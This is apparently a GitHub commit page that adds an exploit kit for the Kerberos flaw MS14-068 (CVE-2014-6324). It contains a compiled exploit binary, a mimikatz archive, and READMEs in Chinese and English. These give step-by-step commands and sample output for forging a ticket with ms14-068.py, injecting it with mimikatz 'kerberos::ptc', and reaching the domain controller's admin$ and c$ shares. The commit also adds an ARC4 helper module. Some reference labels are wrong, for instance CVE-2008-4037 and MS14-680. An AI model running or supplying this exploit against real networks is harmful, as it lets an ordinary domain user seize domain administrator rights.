Skip to content

Commit bb4b25c

Browse files
GitmanincGitmaninc
committed
MS14-068
1 parent 973a608 commit bb4b25c

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

46 files changed

+4772
-0
lines changed

MS14-068/MS14-068.exe

3.33 MB
Binary file not shown.

MS14-068/README.md

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
# MS14-068
2+
3+
```
4+
将普通域用户权限提升为域控权限
5+
(漏洞利用后,netuse \\swg.server.com\c$可以直接访问域控的网络资源
6+
```
7+
8+
Vulnerability reference:
9+
* [MS14-068](https://technet.microsoft.com/library/security/ms14-068)
10+
* [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324)
11+
12+
## Usage
13+
```
14+
域管理员:DCwin03 域名:demo.com 普通域用户:hx
15+
16+
登录普通域用户hx,cmd中输入"whoami/user"获取sid
17+
demo/hx S-1-5-21-3813283032-1038476579-1047458262-1110
18+
19+
![x1](img/x1.png)
20+
![x2](img/x2.png)
21+
退出域用户hx,登录本地用户123
22+
23+
python ms14-068.py -u [email protected] -p pwd_of_test -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com
24+
![x3](img/x4.png)
25+
![x4](img/x4.png)
26+
c:\User\123>Mimikatz.exe "kerberos:ptc [email protected]" exit
27+
28+
net use \\DCwin03\admin$
29+
30+
dir \\DCwin03\c$
31+
```
32+
33+
34+
## References
35+
* [Additional information about CVE-2014-6324](http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx)
36+
* [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html)
37+
* [Attack Methods for Gaining Domain Admin Rights in Active Directory](https://adsecurity.org/?p=2362)
38+
* [MS14068域控提权漏洞及其防护](http://www.php230.com/weixin1418640395.html)
39+
* [MS14-068 privilege escalation PoC](http://www.secpulse.com/archives/2874.html)
40+
41+
42+

MS14-068/img/x1.png

21.2 KB
Loading

MS14-068/img/x2.png

6.75 KB
Loading

MS14-068/img/x3.png

21.3 KB
Loading

MS14-068/img/x4.png

8.3 KB
Loading

MS14-068/mimikatz_trunk.zip

708 KB
Binary file not shown.

MS14-068/pykek/README.md

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
Python Kerberos Exploitation Kit
2+
===
3+
4+
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
5+
6+
For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .
7+
8+
More is coming...
9+
10+
# Author
11+
Sylvain Monné
12+
13+
Contact : sylvain dot monne at solucom dot fr
14+
15+
http://twitter.com/bidord
16+
17+
Special thanks to: Benjamin DELPY `gentilkiwi`
18+
19+
# Library content
20+
* kek.krb5: Kerberos V5 ([RFC 4120](https://tools.ietf.org/html/rfc4120)) ASN.1 structures and basic protocol functions
21+
* kek.ccache: Credential Cache Binary Format ([cchache](http://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html))
22+
* kek.pac: Microsoft Privilege Attribute Certificate Data Structure ([MS-PAC](http://msdn.microsoft.com/en-us/library/cc237917.aspx))
23+
* kek.crypto: Kerberos and MS specific cryptographic functions
24+
25+
# Exploits
26+
## ms14-068.py
27+
Exploits [MS14-680](https://technet.microsoft.com/en-us/library/security/ms14-068.aspx) vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
28+
- Domain Users (513)
29+
- Domain Admins (512)
30+
- Schema Admins (518)
31+
- Enterprise Admins (519)
32+
- Group Policy Creator Owners (520)
33+
34+
### Usage :
35+
```
36+
USAGE:
37+
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
38+
39+
OPTIONS:
40+
-p <clearPassword>
41+
--rc4 <ntlmHash>
42+
```
43+
### Example usage :
44+
#### Linux (tested with samba and MIT Kerberos)
45+
```
46+
root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
47+
Password:
48+
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
49+
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
50+
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
51+
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
52+
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
53+
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
54+
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
55+
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
56+
[+] Creating ccache file '[email protected]'... Done!
57+
root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0
58+
```
59+
#### On Windows
60+
61+
```
62+
python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
63+
mimikatz.exe "kerberos::ptc [email protected]" exit`
64+
```

MS14-068/pykek/kek/__init__.py

Whitespace-only changes.

MS14-068/pykek/kek/_crypto/ARC4.py

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
class ARC4Cipher(object):
2+
def __init__(self, key):
3+
self.key = key
4+
5+
def encrypt(self, data):
6+
S = range(256)
7+
j = 0
8+
out = []
9+
for i in range(256):
10+
j = (j + S[i] + ord( self.key[i % len(self.key)] )) % 256
11+
S[i] , S[j] = S[j] , S[i]
12+
i = j = 0
13+
for char in data:
14+
i = ( i + 1 ) % 256
15+
j = ( j + S[i] ) % 256
16+
S[i] , S[j] = S[j] , S[i]
17+
out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
18+
return ''.join(out)
19+
20+
def decrypt(self, data):
21+
return self.encrypt(data)
22+
23+
def new(key):
24+
return ARC4Cipher(key)

0 commit comments

Comments
 (0)